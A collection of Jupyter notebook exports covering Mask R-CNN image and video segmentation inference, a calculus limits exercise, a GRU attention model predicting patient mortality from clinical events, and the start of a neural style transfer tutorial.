fpn_p3 (Conv2D)
fpn_p4 (Conv2D)
In model: rpn_model
rpn_conv_shared (Conv2D)
rpn_class_raw (Conv2D)
rpn_bbox_pred (Conv2D)
mrcnn_mask_conv1 (TimeDistributed)
mrcnn_mask_bn1 (TimeDistributed)
mrcnn_mask_conv2 (TimeDistributed)
mrcnn_mask_bn2 (TimeDistributed)
mrcnn_class_conv1 (TimeDistributed)
mrcnn_class_bn1 (TimeDistributed)
mrcnn_mask_conv3 (TimeDistributed)
mrcnn_mask_bn3 (TimeDistributed)
mrcnn_class_conv2 (TimeDistributed)
mrcnn_class_bn2 (TimeDistributed)
mrcnn_mask_conv4 (TimeDistributed)
mrcnn_mask_bn4 (TimeDistributed)
mrcnn_bbox_fc (TimeDistributed)
mrcnn_mask_deconv (TimeDistributed)
mrcnn_class_logits (TimeDistributed)
mrcnn_mask (TimeDistributed)
WARNING:tensorflow:From /usr/local/lib/python3.6/dist-packages/keras/optimizers.py:793: The name tf.train.Optimizer is deprecated. Please use tf.compat.v1.train.Optimizer instead.
###Markdown
Prepare to run InferenceCreate a new InferenceConfig, then use it to create a new model.
###Code
class InferenceConfig(CocoSynthConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
DETECTION_MIN_CONFIDENCE = 0.01
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
###Output
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:720: The name tf.sets.set_intersection is deprecated. Please use tf.sets.intersection instead.
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:722: The name tf.sparse_tensor_to_dense is deprecated. Please use tf.sparse.to_dense instead.
WARNING:tensorflow:From /content/drive/My Drive/Mask_RCNN-master/mrcnn/model.py:772: to_float (from tensorflow.python.ops.math_ops) is deprecated and will be removed in a future version.
Instructions for updating:
Use `tf.cast` instead.
###Markdown
Load Trained WeightsNote: The code is set to find_last() by default, but you can also point the model to a specific pretrained weights file if you use line 3 instead of line 4.
###Code
# Get path to saved weights
# Either set a specific path or find last trained weights
#model_path = str(Path(ROOT_DIR) / "logs" / "cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_0039.h5" )
model_path = model.find_last()
# Load trained weights (fill in path to trained weights here)
assert model_path != "", "Provide path to trained weights"
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
###Output
Loading weights from /content/drive/My Drive/Mask_RCNN-master/logs/cocosynth_dataset20200202T0200/mask_rcnn_cocosynth_dataset_0070.h5
Re-starting from epoch 70
###Markdown
Image InferenceRun model.detect() on real images.We get some false positives, and some misses. More training images are likely needed to improve the results.You can adjust the "figsize" in the cell below to make the image larger or smaller.
###Code
import skimage
#real_test_dir = '/content/drive/My Drive/29012020/output_1class_cracks/output_cracks/val/images'
real_test_dir = '/content/drive/My Drive/Mask_RCNN-master/test_data/ext'
image_paths = []
for filename in os.listdir(real_test_dir):
if os.path.splitext(filename)[1].lower() in ['.png', '.jpg', '.jpeg']:
image_paths.append(os.path.join(real_test_dir, filename))
for image_path in image_paths:
img = skimage.io.imread(image_path)
img_arr = np.array(img)
results = model.detect([img_arr], verbose=1)
r = results[0]
n_instances = r['rois'].shape[0]
visualize.display_instances(img, r['rois'], r['masks'], r['class_ids'],
dataset_train.class_names, r['scores'], (0,255,128), figsize=(8,8))
visualize.display_weight_stats(model)
###Output
_____no_output_____
###Markdown
Video Inference Prepare to run Video InferenceNote: This code is adapted from https://www.dlology.com/blog/how-to-run-object-detection-and-segmentation-on-video-fast-for-free/ created by Chengwei Zhang.In this section, we'll open up a video, run inference on it, and output a new video with segmentations and labels.
###Code
video_file = Path("../datasets/box_dataset_synthetic/videotest/boxvideo_24fps.mp4")
video_save_dir = Path("../datasets/box_dataset_synthetic/videotest/save")
video_save_dir.mkdir(exist_ok=True)
###Output
_____no_output_____
###Markdown
Adjust Config ParametersDepending on the resolution of your video, you may want to update the parameters below.Mask R-CNN requires IMAGE_MIN_DIM to be divisible by 2, six times, so that's why I'm using 1088 instead of 1080, which is the actual height of the video.
###Code
class VideoInferenceConfig(CocoSynthConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 1088
IMAGE_MAX_DIM = 1920
IMAGE_SHAPE = [1920, 1080, 3]
DETECTION_MIN_CONFIDENCE = 0.80
inference_config = VideoInferenceConfig()
###Output
_____no_output_____
###Markdown
Set Up Model and Load Trained Weights
###Code
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
# model_path = str(Path(ROOT_DIR) / "logs" / "box_synthetic20190328T2255/mask_rcnn_box_synthetic_0016.h5" )
model_path = model.find_last()
# Load trained weights (fill in path to trained weights here)
assert model_path != "", "Provide path to trained weights"
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
import cv2
import skimage
import random
import colorsys
from tqdm import tqdm
def random_colors(N, bright=True):
""" Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
Args:
N: the number of colors to generate
bright: whether or not to use bright colors
Returns:
a list of RGB colors, e.g [(0.0, 1.0, 0.0), (1.0, 0.0, 0.5), ...]
"""
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def apply_mask(image, mask, color, alpha=0.5):
""" Apply the given mask to the image.
Args:
image: a cv2 image
mask: a mask of which pixels to color
color: the color to use
alpha: how visible the mask should be (0 to 1)
Returns:
a cv2 image with mask applied
"""
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
def display_instances(image, boxes, masks, ids, names, scores, colors):
""" Take the image and results and apply the mask, box, and label
Args:
image: a cv2 image
boxes: a list of bounding boxes to display
masks: a list of masks to display
ids: a list of class ids
names: a list of class names corresponding to the ids
scores: a list of scores of each instance detected
colors: a list of colors to use
Returns:
a cv2 image with instances displayed
"""
n_instances = boxes.shape[0]
if not n_instances:
return image # no instances
else:
assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]
for i, color in enumerate(colors):
# Check if any boxes to show
if not np.any(boxes[i]):
continue
# Check if any scores to show
if scores is not None:
score = scores[i]
else:
score = None
# Add the mask
image = apply_mask(image, masks[:, :, i], color)
# Add the bounding box
y1, x1, y2, x2 = boxes[i]
image = cv2.rectangle(image, (x1, y1), (x2, y2), color, 2)
# Add the label
label = names[ids[i]]
if score:
label = f'{label} {score:.2f}'
label_pos = (x1 + (x2 - x1) // 2, y1 + (y2 - y1) // 2) # center of bounding box
image = cv2.putText(image, label, label_pos, cv2.FONT_HERSHEY_DUPLEX, 0.7, color, 2)
return image
###Output
_____no_output_____
###Markdown
Prepare for InferenceAdjust the paths below to point to your video
###Code
video_file = Path("../datasets/box_dataset_synthetic/videotest/boxvideo_24fps.mp4")
video_save_dir = Path("../datasets/box_dataset_synthetic/videotest/save")
video_save_dir.mkdir(exist_ok=True)
vid_name = video_save_dir / "output.mp4"
v_format="FMP4"
fourcc = cv2.VideoWriter_fourcc(*v_format)
print('Writing output video to: ' + str(vid_name))
###Output
Writing output video to: ..\datasets\box_dataset_synthetic\videotest\save\output.mp4
###Markdown
Random colors can be a bit intense with video, so I've set it to use the same color for each object. You can try random colors if you like.Note: cv2 uses BGR (Blue Green Red) color representation instead of RGB (Red Green Blue), so we have to do a couple conversions here
###Code
#colors = random_colors(30)
colors = [(1.0, 1.0, 0.0)] * 30
# Change color representation from RGB to BGR before displaying instances
colors = [(color[2], color[1], color[0]) for color in colors]
###Output
_____no_output_____
###Markdown
Perform Inference on VideoUse the cv2 module to open the video and perform inference on each frame.
###Code
input_video = cv2.VideoCapture(str(video_file))
frame_count = int(input_video.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(input_video.get(cv2.CAP_PROP_FPS))
output_video = None
vid_size = None
current_frame = 0
for i in tqdm(range(frame_count)):
# Read the current frame
ret, frame = input_video.read()
if not ret:
break
current_frame += 1
# Change color representation from BGR to RGB before running model.detect()
detect_frame = frame[:, :, ::-1]
# Run inference on the color-adjusted frame
results = model.detect([detect_frame], verbose=0)
r = results[0]
n_instances = r['rois'].shape[0]
# Make sure we have enough colors
if len(colors) < n_instances:
# not enough colors, generate more
more_colors = random_colors(n_instances - len(colors))
# Change color representation from RGB to BGR before displaying instances
more_colors = [(color[2], color[1], color[0]) for color in more_colors]
colors += more_colors
# Display instances on the original frame
display_frame = display_instances(frame, r['rois'], r['masks'], r['class_ids'],
dataset_train.class_names, r['scores'], colors[0:n_instances])
# Make sure we got displayed instances
if display_frame is not None:
frame = display_frame
# Create the output_video if it doesn't yet exist
if output_video is None:
if vid_size is None:
vid_size = frame.shape[1], frame.shape[0]
output_video = cv2.VideoWriter(str(vid_name), fourcc, float(fps), vid_size, True)
# Resize frame if necessary
if vid_size[0] != frame.shape[1] and vid_size[1] != frame.shape[0]:
frame = cv2.resize(frame, vid_size)
# Write the frame to the output_video
output_video.write(frame)
input_video.release()
output_video.release()
###Output
_____no_output_____ |
nb_Limits/limits_nb_TIY2.ipynb | ###Markdown
Computational Examples: Limits
###Code
# The following line will initialize the notebook by loading some libraries necessary to run the code below
%run limits_def.py
###Output
_____no_output_____
###Markdown
Estimating limits using a table Choose a function $f$ and a number $r$.
###Code
f = function('x^3-3x+5')
r = 1.3
show_limit_analysis(f,r)
###Output
_____no_output_____
###Markdown
Confirm estimate You can confirm your estimate by running the cell below. This will compute the limit formally.
###Code
limit(f,r)
###Output
_____no_output_____
###Markdown
Try it yourself! Repeat the above analysis for diffwerent values of $r$ and other choices of $f$.For example, try- $f(x) = 2^x+x^2-1$, $r = 0.5$- $f(x) = \dfrac{1-x}{1+x^2}$, $r = -1.8$ Estimating limits by evaluating a function Next, we generate a random function $g(x)$ and pick a number $s$:
###Code
g = generate_random_function()
###Output
_____no_output_____
###Markdown
In this example, we will not know the function $g(x)$ explicitely, but we can evaluate $g$ for specific $x$, such as:
###Code
g(3)
###Output
_____no_output_____
###Markdown
Use the evaluation cells to compute values $g(x)$ for $x$ approaching $s$ from the right:
###Code
g(2.1)
g(2.201)
g(2.200001)
g(2.200000001)
###Output
_____no_output_____
###Markdown
It looks like `13.25` is a good estimate for the limit. Let's confirm this.
###Code
limit(g,s)
###Output
_____no_output_____
###Markdown
Note that in this case, we cannot simply evaluate $g$ at $x=2.2$ to obtain the limit:
###Code
g(2.2)
###Output
_____no_output_____
###Markdown
Now try this again with different $g$ and $s$. Activate the `Live Code` option and run the cell `g = generate_random_function()` above to generate new $g,s$.
###Code
g,s = generate_example()
###Output
_____no_output_____
###Markdown
We first compute a table with values of $g(x)$ for numbers $x$ close, *but not equal to*, $s$:
###Code
show_table(g, [s-0.1, s-0.01, s-0.001, s+0.001, s+0.01, s+0.1])
###Output
_____no_output_____
###Markdown
It certainly appears that the left-hand limit is not equal to the right-hand limit.For further detail, we can evaluate $g$ at additional inputs:
###Code
g(s-0.0000001)
g(s+0.0000001)
###Output
_____no_output_____
###Markdown
These values should give us a good estimate of the limits. Let's confirm this by computing the limit formally:
###Code
lim_left(g,s)
lim_right(g,s)
###Output
_____no_output_____ |
events_network.ipynb | ###Markdown
Events NetworkThis notebook runs the Events Network by itself, to validate the contribution of the Network when we train and test based on this network alone. Import Libraries
###Code
from __future__ import print_function
import numpy as np
import string
import datetime
import pandas as pd
import matplotlib.pyplot as plt
import os
import torch
import torch.nn as nn
import time
import pickle
import random
import math
from torch.utils.data import Dataset
from torch.utils.data.dataset import random_split
from torch.utils.data import DataLoader, Subset
from sklearn.metrics import precision_recall_fscore_support, roc_auc_score
###Output
_____no_output_____
###Markdown
Initialization
###Code
#
seed = 230729
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
max_code = pickle.load(open('events_maxcode.p', 'rb')) + 1
assert max_code==127, "EVENTS MAX CODE changed?"
###Output
_____no_output_____
###Markdown
We know that not all patients have the same number of visit dates, therefore, we need to find what is the maximum number of visit dates for any given patient
###Code
patients_max_visits = 505
###Output
_____no_output_____
###Markdown
In preparation to run the models training on CUDA, we need to make sure that we do have a device and load the tensors and model to CUDA
###Code
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
print()
#Additional Info when using cuda
if device.type == 'cuda':
print(torch.cuda.get_device_name(0))
print('Memory Usage:')
print('Allocated:', round(torch.cuda.memory_allocated(0)/1024**3,1), 'GB')
print('Cached: ', round(torch.cuda.memory_reserved(0)/1024**3,1), 'GB')
###Output
Using device: cuda
NVIDIA GeForce GTX 1060 6GB
Memory Usage:
Allocated: 0.0 GB
Cached: 0.0 GB
###Markdown
Loading data from filesThese files were generated from SQL queries contained in notes_extraction.ipynb and events_extraction.ipynb notebooks.
###Code
def load_events_dataset_object(prefix=''):
return pickle.load( open(prefix + "events_item.p", "rb" )), pickle.load(open(prefix + "events_value.p", "rb"))
###Output
_____no_output_____
###Markdown
Dataset Definition
###Code
def load_notes_dataset_object(prefix = ''):
patient_subject_id = np.load(prefix + 'subject_id.npy', allow_pickle=True).tolist()
patients_notes_fetures = np.load(prefix + 'patients_notes_fetures.npy', allow_pickle=True)
index_0 = np.load(prefix + 'index_0.npy', allow_pickle=True)
index_1 = np.load(prefix + 'index_1.npy', allow_pickle=True)
patient_mortality = np.load(prefix + 'patient_mortality.npy', allow_pickle=True)
return patient_subject_id, patients_notes_fetures, index_0, index_1, patient_mortality
class NotesEventsDataset(Dataset):
def __init__(self, patient_id, patients_notes, notes_mask, events_items, events_values, mortality):
self.patient_id = patient_id
len_events_patients = len(events_items['subject_id'].unique())
self.x = patients_notes.to(device, non_blocking=True)
self.notes_mask = notes_mask.to(device, non_blocking=True)
self.y = mortality.to(device, non_blocking=True)
self.items = events_items.groupby('subject_id').agg('codes').apply(list).values
self.values = events_values.groupby('subject_id').agg('values').apply(list).values
assert len(self.x) == len_events_patients, 'Notes patients and events patients counts do not match!'
r = random.randrange(len(self.x))
assert events_items['subject_id'].unique()[r] == self.patient_id[r], 'Notes and events patient id=' + str(r) + ' does not match'
def __len__(self):
return len(self.x)
def __getitem__(self, index):
events = np.zeros([len(self.items[index]), max_code])
for i, codes in enumerate(self.items[index]):
for j, code in enumerate(codes):
v = self.values[index][i][j]
events[i, code] = v if not math.isnan(v) else 0.0
return(self.x[index].to_dense(), self.notes_mask[index].to_dense(), events, self.y[index])
def create_dataset (cohort_type = 'original'):
"""
cohort_type = 'original' -> Unbalanced cohort will be created
cohort_type = 'essential' -> Unbalanced cohort with just the minimum set of events features
cohort_type = 'balanced_train' -> Balanced cohort for training will be created
cohort_type = 'balanced_test' -> Balanced cohort for testing will be created
"""
notes_prefix = "orig_" if cohort_type in ['original','essential'] else "train_" if cohort_type == 'balanced_train' else "test_"
subject_id, patients_notes_fetures, index_0, index_1, patient_mortality= load_notes_dataset_object(prefix = notes_prefix)
index = [index_0, index_1]
patients_notes_fetures = torch.sparse_coo_tensor(index, patients_notes_fetures, (len(subject_id),patients_max_visits,200), dtype = torch.float)
ones = np.ones((len(index_0),200))
notes_mask = torch.sparse_coo_tensor(index, ones, (len(subject_id),patients_max_visits,200), dtype = torch.float)
patient_mortality = torch.from_numpy(patient_mortality).float()
events_prefix = "" if cohort_type=='original' else cohort_type +"_"
events_items, events_values = load_events_dataset_object(events_prefix)
assert len(events_items)==len(events_values) and len(events_values['subject_id'].unique()) == len(events_items['subject_id'].unique()) == len(patient_mortality) , "Wrong events dataframes?"
dataset = NotesEventsDataset(subject_id, patients_notes_fetures, notes_mask, events_items, events_values, patient_mortality)
assert len(patient_mortality) == len(dataset), 'Wrong dataset length!'
print ("Number of Patients:", len(patient_mortality))
return dataset
###Output
_____no_output_____
###Markdown
Dataloaders Definition
###Code
batch_size = 50
def collate_fn(data):
x, notes_mask, events, mortality_flag = zip(*data)
maxvisits = max([len(p) for p in events])
events_result = torch.tensor([np.concatenate((p, np.zeros([maxvisits - len(p), max_code]))) for p in events]).float()
events_mask = torch.tensor([np.concatenate((np.ones(len(p)), np.zeros(maxvisits - len(p)))) for p in events]).int()
x = torch.stack(x)
notes_mask = torch.stack(notes_mask)
mortality_flag = torch.stack(mortality_flag)
events_result = events_result.to(device, non_blocking=True)
events_mask = events_mask.to(device, non_blocking=True)
return x, notes_mask, events_result, events_mask, mortality_flag
###Output
_____no_output_____
###Markdown
Dataloader for the unbalanced (original) cohort.
###Code
def get_unbalanced_dataloaders (max_size = 0):
dataset = create_dataset('original')
if (max_size > 0):
print ("***** Slicing to " + str(max_size))
dataset = Subset(dataset, np.arange(max_size))
split = int(len(dataset)*0.8)
lengths = [split, len(dataset) - split]
train_dataset, val_dataset = random_split(dataset, lengths)
train_loader = DataLoader(train_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=False)
return train_loader, val_loader
###Output
_____no_output_____
###Markdown
Dataloader for the balanced cohort (data up-sampling) for "dead" patients to eliminate class imbalance).
###Code
def get_balanced_dataloaders (max_size = 0):
print ("* Train dataset *")
balanced_train_dataset = create_dataset('balanced_train')
print ("* Test dataset *")
balanced_test_dataset = create_dataset('balanced_test')
if (max_size > 0):
print ("***** Slicing to " + str(max_size))
balanced_train_dataset = Subset(balanced_train_dataset, np.arange(max_size))
balanced_test_dataset = Subset(balanced_test_dataset, np.arange(max_size))
train_loader = DataLoader(balanced_train_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=True)
val_loader = DataLoader(balanced_test_dataset, batch_size=batch_size, collate_fn=collate_fn, shuffle=False)
return train_loader, val_loader
###Output
_____no_output_____
###Markdown
Model Definition Alpha Attention
###Code
class AlphaAttention(torch.nn.Module):
"""
Alpha attention mechanism to compute the attention weights corresponding to each date with events data.
"""
def __init__(self, hidden_dim):
super().__init__()
"""
Arguments:
hidden_dim: the hidden layer dimension
"""
self.a_att = nn.Linear(hidden_dim, 1)
def forward(self, g):
"""
Arguments:
g: the output tensor from RNN-alpha of shape (batch_size, seq_length, hidden_dim)
Outputs:
alpha: the corresponding attention weights of shape (batch_size, seq_length, 1)
"""
return torch.softmax(self.a_att(g), dim=1)
###Output
_____no_output_____
###Markdown
Beta Attention
###Code
class BetaAttention(torch.nn.Module):
"""
Beta attention mechanism to compute the attention weights corresponding to each event code.
"""
def __init__(self, input_dim, emb_dim):
super().__init__()
"""
Arguments:
input_dim: the hidden layer dimension
emb_dim: the number of events codes
"""
self.b_att = nn.Linear(input_dim, emb_dim)
def forward(self, h):
"""
Arguments:
h: the output tensor from RNN-beta of shape (batch_size, seq_length, input_dim)
Outputs:
beta: the corresponding attention weights of shape (batch_size, seq_length, # of events codes)
"""
return torch.tanh(self.b_att(h))
###Output
_____no_output_____
###Markdown
Events Network
###Code
class EventsRNN(nn.Module):
def attention_sum(self, alpha, beta, x, masks):
"""
Performs the weighted sum of the events data using alpha and beta attention weights.
It also sets to 0 the positions corresponding to dates without events data using the masks information.
Arguments:
alpha: the alpha attention weights of shape (batch_size, seq_length, 1)
beta: the beta attention weights of shape (batch_size, seq_length, hidden_dim)
x: the events data for each date with shape (batch_size, # of dates, # of events codes)
masks: the padding masks in time of shape (batch_size, # of dates, # of events codes)
Outputs:
c: the context vector of shape (batch_size, hidden_dim)
"""
masks = masks.unsqueeze(-1)
return torch.sum( beta * x * alpha * masks , dim=1 )
def __init__(self, num_codes, emb_size=128):
super().__init__()
# Define the RNN-alpha using `nn.GRU()`
self.rnn_a = nn.GRU(num_codes, 128, batch_first=True)
# Define the RNN-beta using `nn.GRU()`
self.rnn_b = nn.GRU(num_codes, 128, batch_first=True)
# Define the alpha-attention using `AlphaAttention()`
self.att_a = AlphaAttention(128)
# Define the beta-attention using `BetaAttention()`
self.att_b = BetaAttention(128, num_codes)
# Define the linear layers using `nn.Linear()`
self.fc = nn.Linear(num_codes, 1)
# Define the final activation layer using `nn.Sigmoid().
self.sigmoid = nn.Sigmoid()
def forward(self, events, masks):
# Pass the events data through RNN-alpha
g, _ = self.rnn_a(events)
# Pass the events data through RNN-beta
h, _ = self.rnn_b(events)
# Obtain the alpha and beta attentions using `AlphaAttention()` and `BetaAttention()`;
alpha = self.att_a(g)
beta = self.att_b(h)
# Perform the weighted sum of the events data using the attention weights for the dates with events data
c = self.attention_sum(alpha, beta, events, masks)
# Pass the context vector through the linear and activation layers.
logits = self.fc(c)
probs = self.sigmoid(logits)
return probs.squeeze()
###Output
_____no_output_____
###Markdown
Model training and evaluation Functions
###Code
def train(model, train_loader, n_epochs):
model.train() # prep model for training
for epoch in range(n_epochs):
curr_epoch_loss = []
print('Batch :', end = ' ')
for step, batch in enumerate(train_loader):
if step % 10 == 0 and step>0:
print(str(step)+',', end=' ' )
x, masks, events, events_masks, labels = batch
""" Step 1. clear gradients """
optimizer.zero_grad()
""" Step 2. evaluate model ouput """
probs = model(events, events_masks)
""" Step 3. Calculate loss """
loss = criterion(probs, labels)
""" Step 4. Backward propagation """
loss.backward()
""" Step 5. optimization """
optimizer.step()
""" Step 6. record loss """
curr_epoch_loss.append(loss.cpu().data.numpy())
print(f"Epoch {epoch}: curr_epoch_loss={np.mean(curr_epoch_loss)}")
return model
def eval_model(model, val_loader):
model.eval()
val_labels = []
val_probs = []
for step, batch in enumerate(val_loader):
x, masks, events, events_masks, labels = batch
with torch.no_grad():
probs = model(events, events_masks)
val_labels.extend(labels.detach().cpu().numpy().tolist())
val_probs.extend(probs.detach().cpu().numpy().reshape(-1).tolist())
precision, recall, f1, _ = precision_recall_fscore_support(val_labels, np.array(val_probs)>0.5, average='binary')
roc_auc = roc_auc_score(val_labels, val_probs)
return precision, recall, f1, roc_auc
def train_and_eval(model, train_loader, val_loader, n_epochs=10, filename='model.pt'):
t0 = time.time()
train(model, train_loader, n_epochs)
t1 = time.time()
processing_time = t1-t0
print('Model Training time: ' + str(processing_time))
p, r, f, roc_auc = eval_model(model, val_loader)
print ("Learning rate: " + str(learning_rate))
print("Model Training time: " + str(processing_time))
print("Precision = ",p)
print("Recall = ", r)
print("F1 = ", f)
print("ROC AUC = ", roc_auc)
print(p,"\t",r,"\t",f,"\t",roc_auc)
"""
if filename is not None:
torch.save(model.state_dict(), filename)
"""
return p, r, f, roc_auc
###Output
_____no_output_____
###Markdown
Model Creation and Optimizer definition
###Code
def create_model_and_optimizer():
model = EventsRNN(max_code, emb_size=128)
if torch.cuda.device_count() >0:
model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
#optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum = 0.9, nesterov = True)
return model, optimizer
###Output
_____no_output_____
###Markdown
Model Training and Evaluation
###Code
learning_rate = 0.001
n_epochs = 10
criterion = nn.BCELoss()
print('Learning Rate: ' + str(learning_rate))
print ("Number of Epochs: " + str(n_epochs))
print ('')
print ('--------------')
print ('Original model')
print ('--------------')
model, optimizer = create_model_and_optimizer()
train_loader, val_loader = get_unbalanced_dataloaders() # You can pass a number to limit the number of samples
train_and_eval(model, train_loader, val_loader, n_epochs, 'unbalanced_model.pt')
#load_and_eval(model, 'unbalanced_model.pt', val_loader)
learning_rate = 0.0001
n_epochs = 10
criterion = nn.BCELoss()
print('Learning Rate: ' + str(learning_rate))
print ("Number of Epochs: " + str(n_epochs))
print ('')
print ('')
print ('--------------')
print ('Balanced model')
print ('--------------')
model, optimizer = create_model_and_optimizer()
train_loader, val_loader = get_balanced_dataloaders() # You can pass a number to limit the number of samples
train_and_eval(model, train_loader, val_loader, n_epochs, 'balanced_model.pt')
#load_and_eval(model, 'balanced_model.pt', val_loader)
###Output
Learning Rate: 0.0001
Number of Epochs: 10
--------------
Balanced model
--------------
* Train dataset *
Number of Patients: 13790
* Test dataset *
Number of Patients: 1965
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 0: curr_epoch_loss=0.6428784728050232
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 1: curr_epoch_loss=0.46494531631469727
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 2: curr_epoch_loss=0.3550058901309967
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 3: curr_epoch_loss=0.28842878341674805
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 4: curr_epoch_loss=0.23932117223739624
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 5: curr_epoch_loss=0.20136545598506927
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 6: curr_epoch_loss=0.17096295952796936
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 7: curr_epoch_loss=0.1442098617553711
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 8: curr_epoch_loss=0.12268555909395218
Batch : 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160, 170, 180, 190, 200, 210, 220, 230, 240, 250, 260, 270, Epoch 9: curr_epoch_loss=0.10383887588977814
Model Training time: 644.5986795425415
Learning rate: 0.0001
Model Training time: 644.5986795425415
Precision = 0.7318840579710145
Recall = 0.8632478632478633
F1 = 0.792156862745098
ROC AUC = 0.9600473023349972
0.7318840579710145 0.8632478632478633 0.792156862745098 0.9600473023349972
|
notebooks/1_style_transfer_colab.ipynb | ###Markdown
Loading in Images
###Code
# Use GPU if available
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Assign desired size of the output image
imsize = 512 if torch.cuda.is_available() else 128
# Create image composer
loader = Compose([
Resize(imsize), # scale imported image
ToTensor() # transform it into a torch tensor
])
# Helper for converting images to tensors
def image_loader(image_name):
image = Image.open(image_name)
# fake batch dimension required to fit network's input dimensions
image = loader(image).unsqueeze(0)
return image.to(device, torch.float)
# Load in images as tensors
style_img = image_loader(requests.get("https://github.com/dkharazi/style-transfer/blob/main/data/style/picasso.jpg?raw=true", stream=True).raw)
content_img = image_loader(requests.get("https://github.com/dkharazi/style-transfer/blob/main/data/content/dancing.jpg?raw=true", stream=True).raw)
# Glimpse of the tensor!
style_img[0][0]
###Output
_____no_output_____
###Markdown
Exploratory Image Plotting
###Code
# Reconvert into PIL image
unloader = ToPILImage()
# Initalize plot in interactive mode
plt.ion()
# Helper for displaying pytorch tensors
def imshow(tensor, title=None):
image = tensor.cpu().clone() # we clone the tensor to not do changes on it
image = image.squeeze(0) # remove the fake batch dimension
image = unloader(image)
plt.imshow(image)
if title is not None:
plt.title(title)
plt.pause(0.001) # pause a bit so that plots are updated
# Plot style image
plt.figure()
imshow(style_img, title='Style Image')
# Plot content image
plt.figure()
imshow(content_img, title='Content Image')
###Output
_____no_output_____
###Markdown
Defining the Loss Functions
###Code
# Define the content loss function
class ContentLoss(Module):
def __init__(self, target,):
super(ContentLoss, self).__init__()
# we 'detach' the target content from the tree used
# to dynamically compute the gradient: this is a stated value,
# not a variable. Otherwise the forward method of the criterion
# will throw an error.
self.target = target.detach()
def forward(self, input):
self.loss = mse_loss(input, self.target)
return input
# Initialize gram matrix function used in style loss function
def gram_matrix(input):
# a is batch size (=1)
# b is number of feature maps
# (c,d) are dimensions of a feature map (N=c*d)
a, b, c, d = input.size()
# resise F_XL into \hat F_XL
features = input.view(a * b, c * d)
# compute the gram product
G = torch.mm(features, features.t())
# we 'normalize' the values of the gram matrix
# by dividing by the number of element in each feature maps.
return G.div(a * b * c * d)
# Define the style loss function
class StyleLoss(Module):
def __init__(self, target_feature):
super(StyleLoss, self).__init__()
self.target = gram_matrix(target_feature).detach()
def forward(self, input):
G = gram_matrix(input)
self.loss = mse_loss(G, self.target)
return input
###Output
_____no_output_____
###Markdown
Loading in the Pretrained VGG-19 Model
###Code
# Load in vgg-19
cnn = vgg19(pretrained=True).features.to(device).eval()
# Initialize normalized channel means and standard deviations
# used in training for the VGG-19 network
cnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)
cnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)
# Create a module to normalize input image
# so we can easily put it in a nn.Sequential
class Normalization(Module):
def __init__(self, mean, std):
super(Normalization, self).__init__()
# .view the mean and std to make them [C x 1 x 1] so that they can
# directly work with image Tensor of shape [B x C x H x W].
# B is batch size. C is number of channels. H is height and W is width.
self.mean = mean.clone().detach().view(-1, 1, 1)
self.std = std.clone().detach().view(-1, 1, 1)
def forward(self, img):
# normalize img
return (img - self.mean) / self.std
###Output
_____no_output_____
###Markdown
Computing Content and Style Losses
###Code
